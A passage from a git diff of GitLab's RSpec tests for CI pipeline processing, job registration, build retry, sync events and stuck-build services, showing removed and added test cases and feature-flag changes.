allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - it 'blocks the stage and continues after it failed' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('delayed') - end - fail_running_or_pending - - expect(builds_names_and_statuses).to eq({ 'delayed': 'failed', 'job': 'pending' }) - expect(pipeline.reload.status).to eq 'pending' - 
end - end - end - - context 'when an exception is raised during a persistent ref creation' do - before do - successful_build('test', stage_idx: 0) - - allow_next_instance_of(Ci::PersistentRef) do |instance| - allow(instance).to receive(:delete_refs) { raise ArgumentError } - end - end - - it 'process the pipeline' do - expect { process_pipeline }.not_to raise_error - end - end - - context 'when there are manual action in earlier stages' do - context 'when first stage has only optional manual actions' do - before do - create_build('build', stage_idx: 0, when: 'manual', allow_failure: true) - create_build('check', stage_idx: 1) - create_build('test', stage_idx: 2) - - process_pipeline - end - - it 'starts from the second stage' do - expect(all_builds_statuses).to eq %w[manual pending created] - end - end - - context 'when second stage has only optional manual actions' do - before do - create_build('check', stage_idx: 0) - create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) - create_build('test', stage_idx: 2) - - process_pipeline - end - - it 'skips second stage and continues on third stage', :sidekiq_inline do - expect(all_builds_statuses).to eq(%w[pending created created]) - - builds.first.success - - expect(all_builds_statuses).to eq(%w[success manual pending]) - end - end - end - - context 'when there are only manual actions in stages' do - before do - create_build('image', stage_idx: 0, when: 'manual', allow_failure: true) - create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) - create_build('deploy', stage_idx: 2, when: 'manual') - create_build('check', stage_idx: 3) - - process_pipeline - end - - it 'processes all jobs until blocking actions encountered' do - expect(all_builds_statuses).to eq(%w[manual manual manual created]) - expect(all_builds_names).to eq(%w[image build deploy check]) - - expect(pipeline.reload).to be_blocked - end - end - - context 'when there is only one manual action' do - before do - 
create_build('deploy', stage_idx: 0, when: 'manual', allow_failure: true) - - process_pipeline - end - - it 'skips the pipeline' do - expect(pipeline.reload).to be_skipped - end - - context 'when the action was played' do - before do - play_manual_action('deploy') - end - - it 'queues the action and pipeline', :sidekiq_inline do - expect(all_builds_statuses).to eq(%w[pending]) - - expect(pipeline.reload).to be_pending - end - end - end - - context 'when blocking manual actions are defined', :sidekiq_inline do - before do - create_build('code:test', stage_idx: 0) - create_build('staging:deploy', stage_idx: 1, when: 'manual') - create_build('staging:test', stage_idx: 2, when: 'on_success') - create_build('production:deploy', stage_idx: 3, when: 'manual') - create_build('production:test', stage_idx: 4, when: 'always') - end - - context 'when first stage succeeds' do - it 'blocks pipeline on stage with first manual action' do - process_pipeline - - expect(builds_names).to eq %w[code:test] - expect(builds_statuses).to eq %w[pending] - expect(pipeline.reload.status).to eq 'pending' - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy] - expect(builds_statuses).to eq %w[success manual] - expect(pipeline.reload).to be_manual - end - end - - context 'when first stage fails' do - it 'does not take blocking action into account' do - process_pipeline - - expect(builds_names).to eq %w[code:test] - expect(builds_statuses).to eq %w[pending] - expect(pipeline.reload.status).to eq 'pending' - - fail_running_or_pending - - expect(builds_names).to eq %w[code:test production:test] - expect(builds_statuses).to eq %w[failed pending] - - succeed_running_or_pending - - expect(builds_statuses).to eq %w[failed success] - expect(pipeline.reload).to be_failed - end - end - - context 'when pipeline is promoted sequentially up to the end' do - before do - # Users need ability to merge into a branch in order to trigger - # protected manual actions. 
- # - create(:protected_branch, :developers_can_merge, - name: 'master', project: project) - end - - it 'properly processes entire pipeline' do - process_pipeline - - expect(builds_names).to eq %w[code:test] - expect(builds_statuses).to eq %w[pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy] - expect(builds_statuses).to eq %w[success manual] - expect(pipeline.reload).to be_manual - - play_manual_action('staging:deploy') - - expect(builds_statuses).to eq %w[success pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test] - expect(builds_statuses).to eq %w[success success pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test - production:deploy] - expect(builds_statuses).to eq %w[success success success manual] - - expect(pipeline.reload).to be_manual - expect(pipeline.reload).to be_blocked - expect(pipeline.reload).not_to be_active - expect(pipeline.reload).not_to be_complete - - play_manual_action('production:deploy') - - expect(builds_statuses).to eq %w[success success success pending] - expect(pipeline.reload).to be_running - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test - production:deploy production:test] - expect(builds_statuses).to eq %w[success success success success pending] - expect(pipeline.reload).to be_running - - succeed_running_or_pending - - expect(builds_names).to eq %w[code:test staging:deploy staging:test - production:deploy production:test] - expect(builds_statuses).to eq %w[success success success success success] - expect(pipeline.reload).to be_success - end - end - end - - context 'when second stage has only on_failure jobs', :sidekiq_inline do - before do - create_build('check', stage_idx: 0) - create_build('build', stage_idx: 1, when: 'on_failure') - create_build('test', stage_idx: 2) - - process_pipeline - end - - it 'skips 
second stage and continues on third stage' do - expect(all_builds_statuses).to eq(%w[pending created created]) - - builds.first.success - - expect(all_builds_statuses).to eq(%w[success skipped pending]) - end - end - - context 'when failed build in the middle stage is retried', :sidekiq_inline do - context 'when failed build is the only unsuccessful build in the stage' do - before do - create_build('build:1', stage_idx: 0) - create_build('build:2', stage_idx: 0) - create_build('test:1', stage_idx: 1) - create_build('test:2', stage_idx: 1) - create_build('deploy:1', stage_idx: 2) - create_build('deploy:2', stage_idx: 2) - end - - it 'does trigger builds in the next stage' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build:1', 'build:2'] - - succeed_running_or_pending - - expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] - - pipeline.builds.find_by(name: 'test:1').success! - pipeline.builds.find_by(name: 'test:2').drop! - - expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] - - Ci::Build.retry(pipeline.builds.find_by(name: 'test:2'), user).reset.success! 
- - expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2', - 'test:2', 'deploy:1', 'deploy:2'] - end - end - end - - context 'when builds with auto-retries are configured', :sidekiq_inline do - before do - create_build('build:1', stage_idx: 0, user: user, options: { script: 'aa', retry: 2 }) - create_build('test:1', stage_idx: 1, user: user, when: :on_failure) - create_build('test:2', stage_idx: 1, user: user, options: { script: 'aa', retry: 1 }) - end - - it 'automatically retries builds in a valid order' do - expect(process_pipeline).to be_truthy - - fail_running_or_pending - - expect(builds_names).to eq %w[build:1 build:1] - expect(builds_statuses).to eq %w[failed pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[build:1 build:1 test:2] - expect(builds_statuses).to eq %w[failed success pending] - - succeed_running_or_pending - - expect(builds_names).to eq %w[build:1 build:1 test:2] - expect(builds_statuses).to eq %w[failed success success] - - expect(pipeline.reload).to be_success - end - end - - context 'when pipeline with needs is created', :sidekiq_inline do - let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } - let!(:mac_build) { create_build('mac:build', stage: 'build', stage_idx: 0) } - let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:linux_rubocop) { create_build('linux:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:mac_rspec) { create_build('mac:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:mac_rubocop) { create_build('mac:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } - let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2) } - - let!(:linux_rspec_on_build) { create(:ci_build_need, build: linux_rspec, name: 'linux:build') } - let!(:linux_rubocop_on_build) { create(:ci_build_need, build: linux_rubocop, name: 'linux:build') } - - 
let!(:mac_rspec_on_build) { create(:ci_build_need, build: mac_rspec, name: 'mac:build') } - let!(:mac_rubocop_on_build) { create(:ci_build_need, build: mac_rubocop, name: 'mac:build') } - - it 'when linux:* finishes first it runs it out of order' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(pending created created)) - expect(builds.pending).to contain_exactly(linux_build, mac_build) - - # we follow the single path of linux - linux_build.reset.success! - - expect(stages).to eq(%w(running pending created)) - expect(builds.success).to contain_exactly(linux_build) - expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) - - linux_rspec.reset.success! - - expect(stages).to eq(%w(running running created)) - expect(builds.success).to contain_exactly(linux_build, linux_rspec) - expect(builds.pending).to contain_exactly(mac_build, linux_rubocop) - - linux_rubocop.reset.success! - - expect(stages).to eq(%w(running running created)) - expect(builds.success).to contain_exactly(linux_build, linux_rspec, linux_rubocop) - expect(builds.pending).to contain_exactly(mac_build) - - mac_build.reset.success! - mac_rspec.reset.success! - mac_rubocop.reset.success! - - expect(stages).to eq(%w(success success pending)) - expect(builds.success).to contain_exactly( - linux_build, linux_rspec, linux_rubocop, mac_build, mac_rspec, mac_rubocop) - expect(builds.pending).to contain_exactly(deploy) - end - - context 'when one of the jobs is run on a failure' do - let!(:linux_notify) { create_build('linux:notify', stage: 'deploy', stage_idx: 2, when: 'on_failure', scheduling_type: :dag) } - - let!(:linux_notify_on_build) { create(:ci_build_need, build: linux_notify, name: 'linux:build') } - - context 'when another job in build phase fails first' do - it 'does skip linux:notify' do - expect(process_pipeline).to be_truthy - - mac_build.reset.drop! - linux_build.reset.success! 
- - expect(linux_notify.reset).to be_skipped - end - end - - context 'when linux:build job fails first' do - it 'does run linux:notify' do - expect(process_pipeline).to be_truthy - - linux_build.reset.drop! - - expect(linux_notify.reset).to be_pending - end - end - end - - context 'when there is a job scheduled with dag but no need (needs: [])' do - let!(:deploy_pages) { create_build('deploy_pages', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } - - it 'runs deploy_pages without waiting prior stages' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(pending created pending)) - expect(builds.pending).to contain_exactly(linux_build, mac_build, deploy_pages) - - linux_build.reset.success! - deploy_pages.reset.success! - - expect(stages).to eq(%w(running pending running)) - expect(builds.success).to contain_exactly(linux_build, deploy_pages) - expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) - - linux_rspec.reset.success! - linux_rubocop.reset.success! - mac_build.reset.success! - mac_rspec.reset.success! - mac_rubocop.reset.success! - - expect(stages).to eq(%w(success success running)) - expect(builds.pending).to contain_exactly(deploy) - end - end - end - - context 'when a needed job is skipped', :sidekiq_inline do - let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } - let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1) } - let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } - - before do - create(:ci_build_need, build: deploy, name: 'linux:build') - end - - it 'skips the jobs depending on it' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(pending created created)) - expect(all_builds.pending).to contain_exactly(linux_build) - - linux_build.reset.drop! 
- - expect(stages).to eq(%w(failed skipped skipped)) - expect(all_builds.failed).to contain_exactly(linux_build) - expect(all_builds.skipped).to contain_exactly(linux_rspec, deploy) - end - end - - context 'when a needed job is manual', :sidekiq_inline do - let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0, when: 'manual', allow_failure: true) } - let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 1, scheduling_type: :dag) } - - before do - create(:ci_build_need, build: deploy, name: 'linux:build') - end - - it 'makes deploy DAG to be skipped' do - expect(process_pipeline).to be_truthy - - expect(stages).to eq(%w(skipped skipped)) - expect(all_builds.manual).to contain_exactly(linux_build) - expect(all_builds.skipped).to contain_exactly(deploy) - end - end - - context 'when a bridge job has parallel:matrix config', :sidekiq_inline do - let(:parent_config) do - <<-EOY - test: - stage: test - script: echo test - - deploy: - stage: deploy - trigger: - include: .child.yml - parallel: - matrix: - - PROVIDER: ovh - STACK: [monitoring, app] - EOY - end - - let(:child_config) do - <<-EOY - test: - stage: test - script: echo test - EOY - end - - let(:pipeline) do - Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload - end - - before do - allow_next_instance_of(Repository) do |repository| - allow(repository) - .to receive(:blob_data_at) - .with(an_instance_of(String), '.gitlab-ci.yml') - .and_return(parent_config) - - allow(repository) - .to receive(:blob_data_at) - .with(an_instance_of(String), '.child.yml') - .and_return(child_config) - end - end - - it 'creates pipeline with bridges, then passes the matrix variables to downstream jobs' do - expect(all_builds_names).to contain_exactly('test', 'deploy: [ovh, monitoring]', 'deploy: [ovh, app]') - expect(all_builds_statuses).to contain_exactly('pending', 'created', 'created') - - succeed_pending - - # bridge jobs directly transition to success - 
expect(all_builds_statuses).to contain_exactly('success', 'success', 'success') - - bridge1 = all_builds.find_by(name: 'deploy: [ovh, monitoring]') - bridge2 = all_builds.find_by(name: 'deploy: [ovh, app]') - - downstream_job1 = bridge1.downstream_pipeline.processables.first - downstream_job2 = bridge2.downstream_pipeline.processables.first - - expect(downstream_job1.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'monitoring') - expect(downstream_job2.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'app') - end - end - - context 'when a bridge job has invalid downstream project', :sidekiq_inline do - let(:config) do - <<-EOY - test: - stage: test - script: echo test - - deploy: - stage: deploy - trigger: - project: invalid-project - EOY - end - - let(:pipeline) do - Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload - end - - before do - stub_ci_pipeline_yaml_file(config) - end - - it 'creates a pipeline, then fails the bridge job' do - expect(all_builds_names).to contain_exactly('test', 'deploy') - expect(all_builds_statuses).to contain_exactly('pending', 'created') - - succeed_pending - - expect(all_builds_names).to contain_exactly('test', 'deploy') - expect(all_builds_statuses).to contain_exactly('success', 'failed') - end - end - - private - - def all_builds - pipeline.processables.order(:stage_idx, :id) - end - - def builds - all_builds.where.not(status: [:created, :skipped]) - end - - def stages - pipeline.reset.stages.map(&:status) - end - - def builds_names - builds.pluck(:name) - end - - def builds_names_and_statuses - builds.each_with_object({}) do |b, h| - h[b.name.to_sym] = b.status - h - end - end - - def all_builds_names - all_builds.pluck(:name) - end - - def builds_statuses - builds.pluck(:status) - end - - def all_builds_statuses - all_builds.pluck(:status) - end - - def succeed_pending - builds.pending.each do |build| - build.reset.success - end - end - - def 
succeed_running_or_pending - pipeline.builds.running_or_pending.each do |build| - build.reset.success - end - end - - def fail_running_or_pending - pipeline.builds.running_or_pending.each do |build| - build.reset.drop - end - end - - def cancel_running_or_pending - pipeline.builds.running_or_pending.each do |build| - build.reset.cancel - end - end - - def play_manual_action(name) - builds.find_by(name: name).play(user) - end - - def enqueue_scheduled(name) - builds.scheduled.find_by(name: name).enqueue_scheduled - end - - def retry_build(name) - Ci::Build.retry(builds.find_by(name: name), user) - end - - def manual_actions - pipeline.manual_actions.reload - end - - def create_build(name, **opts) - create(:ci_build, :created, pipeline: pipeline, name: name, **with_stage_opts(opts)) - end - - def successful_build(name, **opts) - create(:ci_build, :success, pipeline: pipeline, name: name, **with_stage_opts(opts)) - end - - def with_stage_opts(opts) - { stage: "stage-#{opts[:stage_idx].to_i}" }.merge(opts) - end - - def delayed_options - { when: 'delayed', options: { script: %w(echo), start_in: '1 minute' } } - end - - def unschedule - pipeline.builds.scheduled.map(&:unschedule) - end -end diff --git a/spec/services/ci/pipeline_processing/shared_processing_service_tests_with_yaml.rb b/spec/services/ci/pipeline_processing/shared_processing_service_tests_with_yaml.rb deleted file mode 100644 index b4ad2512593..00000000000 --- a/spec/services/ci/pipeline_processing/shared_processing_service_tests_with_yaml.rb +++ /dev/null @@ -1,61 +0,0 @@ -# frozen_string_literal: true - -RSpec.shared_context 'Pipeline Processing Service Tests With Yaml' do - let_it_be(:project) { create(:project, :repository) } - let_it_be(:user) { project.owner } - - where(:test_file_path) do - Dir.glob(Rails.root.join('spec/services/ci/pipeline_processing/test_cases/*.yml')) - end - - with_them do - let(:test_file) { YAML.load_file(test_file_path) } - let(:pipeline) { 
Ci::CreatePipelineService.new(project, user, ref: 'master').execute(:pipeline).payload } - - before do - stub_ci_pipeline_yaml_file(YAML.dump(test_file['config'])) - end - - it 'follows transitions' do - expect(pipeline).to be_persisted - Sidekiq::Worker.drain_all # ensure that all async jobs are executed - check_expectation(test_file.dig('init', 'expect'), "init") - - test_file['transitions'].each_with_index do |transition, idx| - event_on_jobs(transition['event'], transition['jobs']) - Sidekiq::Worker.drain_all # ensure that all async jobs are executed - check_expectation(transition['expect'], "transition:#{idx}") - end - end - - private - - def check_expectation(expectation, message) - expect(current_state.deep_stringify_keys).to eq(expectation), message - end - - def current_state - # reload pipeline and all relations - pipeline.reload - - { - pipeline: pipeline.status, - stages: pipeline.stages.pluck(:name, :status).to_h, - jobs: pipeline.latest_statuses.pluck(:name, :status).to_h - } - end - - def event_on_jobs(event, job_names) - statuses = pipeline.latest_statuses.by_name(job_names).to_a - expect(statuses.count).to eq(job_names.count) # ensure that we have the same counts - - statuses.each do |status| - if event == 'play' - status.play(user) - else - status.public_send("#{event}!") - end - end - end - end -end diff --git a/spec/services/ci/play_build_service_spec.rb b/spec/services/ci/play_build_service_spec.rb index babd601e0cf..34f77260334 100644 --- a/spec/services/ci/play_build_service_spec.rb +++ b/spec/services/ci/play_build_service_spec.rb @@ -79,12 +79,22 @@ RSpec.describe Ci::PlayBuildService, '#execute' do { key: 'second', secret_value: 'second' }] end + subject { service.execute(build, job_variables) } + it 'assigns the variables to the build' do - service.execute(build, job_variables) + subject expect(build.reload.job_variables.map(&:key)).to contain_exactly('first', 'second') end + context 'when variables are invalid' do + let(:job_variables) { 
[{}] } + + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::RecordInvalid) + end + end + context 'when user defined variables are restricted' do before do project.update!(restrict_user_defined_variables: true) @@ -96,7 +106,7 @@ RSpec.describe Ci::PlayBuildService, '#execute' do end it 'assigns the variables to the build' do - service.execute(build, job_variables) + subject expect(build.reload.job_variables.map(&:key)).to contain_exactly('first', 'second') end @@ -104,8 +114,7 @@ RSpec.describe Ci::PlayBuildService, '#execute' do context 'when user is developer' do it 'raises an error' do - expect { service.execute(build, job_variables) } - .to raise_error Gitlab::Access::AccessDeniedError + expect { subject }.to raise_error Gitlab::Access::AccessDeniedError end end end diff --git a/spec/services/ci/process_sync_events_service_spec.rb b/spec/services/ci/process_sync_events_service_spec.rb new file mode 100644 index 00000000000..00b670ff54f --- /dev/null +++ b/spec/services/ci/process_sync_events_service_spec.rb @@ -0,0 +1,129 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::ProcessSyncEventsService do + let!(:group) { create(:group) } + let!(:project1) { create(:project, group: group) } + let!(:project2) { create(:project, group: group) } + let!(:parent_group_1) { create(:group) } + let!(:parent_group_2) { create(:group) } + + subject(:service) { described_class.new(sync_event_class, hierarchy_class) } + + describe '#perform' do + subject(:execute) { service.execute } + + context 'for Projects::SyncEvent' do + let(:sync_event_class) { Projects::SyncEvent } + let(:hierarchy_class) { ::Ci::ProjectMirror } + + before do + Projects::SyncEvent.delete_all + + project1.update!(group: parent_group_1) + project2.update!(group: parent_group_2) + end + + it 'consumes events' do + expect { execute }.to change(Projects::SyncEvent, :count).from(2).to(0) + + expect(project1.ci_project_mirror).to have_attributes( + 
namespace_id: parent_group_1.id + ) + expect(project2.ci_project_mirror).to have_attributes( + namespace_id: parent_group_2.id + ) + end + + it 'enqueues Projects::ProcessSyncEventsWorker if any left' do + stub_const("#{described_class}::BATCH_SIZE", 1) + + expect(Projects::ProcessSyncEventsWorker).to receive(:perform_async) + + execute + end + + it 'does not enqueue Projects::ProcessSyncEventsWorker if no left' do + stub_const("#{described_class}::BATCH_SIZE", 2) + + expect(Projects::ProcessSyncEventsWorker).not_to receive(:perform_async) + + execute + end + + context 'when there is no event' do + before do + Projects::SyncEvent.delete_all + end + + it 'does nothing' do + expect { execute }.not_to change(Projects::SyncEvent, :count) + end + end + + context 'when the FF ci_namespace_project_mirrors is disabled' do + before do + stub_feature_flags(ci_namespace_project_mirrors: false) + end + + it 'does nothing' do + expect { execute }.not_to change(Projects::SyncEvent, :count) + end + end + end + + context 'for Namespaces::SyncEvent' do + let(:sync_event_class) { Namespaces::SyncEvent } + let(:hierarchy_class) { ::Ci::NamespaceMirror } + + before do + Namespaces::SyncEvent.delete_all + + group.update!(parent: parent_group_2) + parent_group_2.update!(parent: parent_group_1) + end + + shared_examples 'event consuming' do + it 'consumes events' do + expect { execute }.to change(Namespaces::SyncEvent, :count).from(2).to(0) + + expect(group.ci_namespace_mirror).to have_attributes( + traversal_ids: [parent_group_1.id, parent_group_2.id, group.id] + ) + expect(parent_group_2.ci_namespace_mirror).to have_attributes( + traversal_ids: [parent_group_1.id, parent_group_2.id] + ) + end + end + + context 'when the FFs sync_traversal_ids, use_traversal_ids and use_traversal_ids_for_ancestors are disabled' do + before do + stub_feature_flags(sync_traversal_ids: false, + use_traversal_ids: false, + use_traversal_ids_for_ancestors: false) + end + + it_behaves_like 'event consuming' + 
end + + it_behaves_like 'event consuming' + + it 'enqueues Namespaces::ProcessSyncEventsWorker if any left' do + stub_const("#{described_class}::BATCH_SIZE", 1) + + expect(Namespaces::ProcessSyncEventsWorker).to receive(:perform_async) + + execute + end + + it 'does not enqueue Namespaces::ProcessSyncEventsWorker if no left' do + stub_const("#{described_class}::BATCH_SIZE", 2) + + expect(Namespaces::ProcessSyncEventsWorker).not_to receive(:perform_async) + + execute + end + end + end +end diff --git a/spec/services/ci/register_job_service_spec.rb b/spec/services/ci/register_job_service_spec.rb index 650353eb751..866015aa523 100644 --- a/spec/services/ci/register_job_service_spec.rb +++ b/spec/services/ci/register_job_service_spec.rb @@ -87,36 +87,10 @@ module Ci end context 'for specific runner' do - context 'with tables decoupling disabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: false, - ci_queueing_builds_enabled_checks: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end - end - - it 'does not pick a build' do - expect(execute(specific_runner)).to be_nil - end - end - - context 'with tables decoupling enabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: true, - ci_queueing_builds_enabled_checks: true) - end - - it 'does not pick a build' do - expect(execute(specific_runner)).to be_nil - expect(pending_job.reload).to be_failed - expect(pending_job.queuing_entry).to be_nil - end + it 'does not pick a build' do + expect(execute(specific_runner)).to be_nil + expect(pending_job.reload).to be_failed + expect(pending_job.queuing_entry).to be_nil end end end @@ -272,34 +246,10 @@ module Ci context 'and uses project runner' do let(:build) { execute(specific_runner) } - context 'with tables decoupling disabled' do - before do - stub_feature_flags( - 
ci_pending_builds_project_runners_decoupling: false, - ci_queueing_builds_enabled_checks: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end - end - - it { expect(build).to be_nil } - end - - context 'with tables decoupling enabled' do - before do - stub_feature_flags( - ci_pending_builds_project_runners_decoupling: true, - ci_queueing_builds_enabled_checks: true) - end - - it 'does not pick a build' do - expect(build).to be_nil - expect(pending_job.reload).to be_failed - expect(pending_job.queuing_entry).to be_nil - end + it 'does not pick a build' do + expect(build).to be_nil + expect(pending_job.reload).to be_failed + expect(pending_job.queuing_entry).to be_nil end end end @@ -790,17 +740,17 @@ module Ci stub_feature_flags(ci_pending_builds_queue_source: true) end - context 'with ci_queueing_denormalize_shared_runners_information enabled' do + context 'with ci_queuing_use_denormalized_data_strategy enabled' do before do - stub_feature_flags(ci_queueing_denormalize_shared_runners_information: true) + stub_feature_flags(ci_queuing_use_denormalized_data_strategy: true) end include_examples 'handles runner assignment' end - context 'with ci_queueing_denormalize_shared_runners_information disabled' do + context 'with ci_queuing_use_denormalized_data_strategy disabled' do before do - stub_feature_flags(ci_queueing_denormalize_shared_runners_information: false) + stub_feature_flags(ci_queuing_use_denormalized_data_strategy: false) end around do |example| @@ -812,37 +762,9 @@ module Ci include_examples 'handles runner assignment' end - context 'with ci_queueing_denormalize_tags_information enabled' do - before do - stub_feature_flags(ci_queueing_denormalize_tags_information: true) - end - - include_examples 'handles runner assignment' - end - - context 'with ci_queueing_denormalize_tags_information disabled' do + context 'with 
ci_queuing_use_denormalized_data_strategy enabled' do before do - stub_feature_flags(ci_queueing_denormalize_tags_information: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end - end - - include_examples 'handles runner assignment' - end - - context 'with ci_queueing_denormalize_namespace_traversal_ids disabled' do - before do - stub_feature_flags(ci_queueing_denormalize_namespace_traversal_ids: false) - end - - around do |example| - allow_cross_joins_across_databases(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/332952') do - example.run - end + stub_feature_flags(ci_queuing_use_denormalized_data_strategy: true) end include_examples 'handles runner assignment' diff --git a/spec/services/ci/retry_build_service_spec.rb b/spec/services/ci/retry_build_service_spec.rb index 16635c64434..5d56084faa8 100644 --- a/spec/services/ci/retry_build_service_spec.rb +++ b/spec/services/ci/retry_build_service_spec.rb @@ -73,6 +73,8 @@ RSpec.describe Ci::RetryBuildService do scheduled_at: 10.seconds.since) end + let_it_be(:internal_job_variable) { create(:ci_job_variable, job: build) } + before_all do # Make sure that build has both `stage_id` and `stage` because FactoryBot # can reset one of the fields when assigning another. 
We plan to deprecate @@ -86,7 +88,7 @@ RSpec.describe Ci::RetryBuildService do file_type: file_type, job: build, expire_at: build.artifacts_expire_at) end - create(:ci_job_variable, job: build) + create(:ci_job_variable, :dotenv_source, job: build) create(:ci_build_need, build: build) create(:terraform_state_version, build: build) end @@ -125,6 +127,11 @@ RSpec.describe Ci::RetryBuildService do expect(new_build.needs_attributes).to match(build.needs_attributes) expect(new_build.needs).not_to match(build.needs) end + + it 'clones only internal job variables' do + expect(new_build.job_variables.count).to eq(1) + expect(new_build.job_variables).to contain_exactly(having_attributes(key: internal_job_variable.key, value: internal_job_variable.value)) + end end describe 'reject accessors' do @@ -147,7 +154,7 @@ RSpec.describe Ci::RetryBuildService do Ci::Build.attribute_names.map(&:to_sym) + Ci::Build.attribute_aliases.keys.map(&:to_sym) + Ci::Build.reflect_on_all_associations.map(&:name) + - [:tag_list, :needs_attributes] - + [:tag_list, :needs_attributes, :job_variables_attributes] - # ee-specific accessors should be tested in ee/spec/services/ci/retry_build_service_spec.rb instead described_class.extra_accessors - [:dast_site_profiles_build, :dast_scanner_profiles_build] # join tables @@ -310,7 +317,7 @@ RSpec.describe Ci::RetryBuildService do expect(build).to be_processed end - context 'when build with deployment is retried' do + shared_examples_for 'when build with deployment is retried' do let!(:build) do create(:ci_build, :with_deployment, :deploy_to_production, pipeline: pipeline, stage_id: stage.id, project: project) @@ -329,7 +336,7 @@ RSpec.describe Ci::RetryBuildService do end end - context 'when build with dynamic environment is retried' do + shared_examples_for 'when build with dynamic environment is retried' do let_it_be(:other_developer) { create(:user).tap { |u| project.add_developer(other_developer) } } let(:environment_name) { 
'review/$CI_COMMIT_REF_SLUG-$GITLAB_USER_ID' } @@ -356,6 +363,18 @@ RSpec.describe Ci::RetryBuildService do end end + it_behaves_like 'when build with deployment is retried' + it_behaves_like 'when build with dynamic environment is retried' + + context 'when create_deployment_in_separate_transaction feature flag is disabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + + it_behaves_like 'when build with deployment is retried' + it_behaves_like 'when build with dynamic environment is retried' + end + context 'when build has needs' do before do create(:ci_build_need, build: build, name: 'build1') diff --git a/spec/services/ci/stuck_builds/drop_pending_service_spec.rb b/spec/services/ci/stuck_builds/drop_pending_service_spec.rb index aa0526edf57..ebc57af77a0 100644 --- a/spec/services/ci/stuck_builds/drop_pending_service_spec.rb +++ b/spec/services/ci/stuck_builds/drop_pending_service_spec.rb @@ -3,8 +3,12 @@ require 'spec_helper' RSpec.describe Ci::StuckBuilds::DropPendingService do - let!(:runner) { create :ci_runner } - let!(:job) { create :ci_build, runner: runner } + let_it_be(:runner) { create(:ci_runner) } + let_it_be(:pipeline) { create(:ci_empty_pipeline) } + let_it_be_with_reload(:job) do + create(:ci_build, pipeline: pipeline, runner: runner) + end + let(:created_at) { } let(:updated_at) { } @@ -14,6 +18,8 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do job_attributes = { status: status } job_attributes[:created_at] = created_at if created_at job_attributes[:updated_at] = updated_at if updated_at + job_attributes.compact! 
+ job.update!(job_attributes) end @@ -41,12 +47,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is dropped with failure reason', 'stuck_or_timeout_failure' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end context 'when job was updated less than 1 day ago' do @@ -63,12 +63,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end context 'when job was updated more than 1 hour ago' do @@ -85,12 +79,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is unchanged' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end end @@ -115,12 +103,6 @@ RSpec.describe Ci::StuckBuilds::DropPendingService do it_behaves_like 'job is dropped with failure reason', 'stuck_or_timeout_failure' end - - context 'when created_at is outside lookback window' do - let(:created_at) { described_class::BUILD_LOOKBACK - 1.day } - - it_behaves_like 'job is unchanged' - end end context 'when job was updated in less than 1 hour ago' do @@ -137,12 +119,6 @@ RSpec.describe 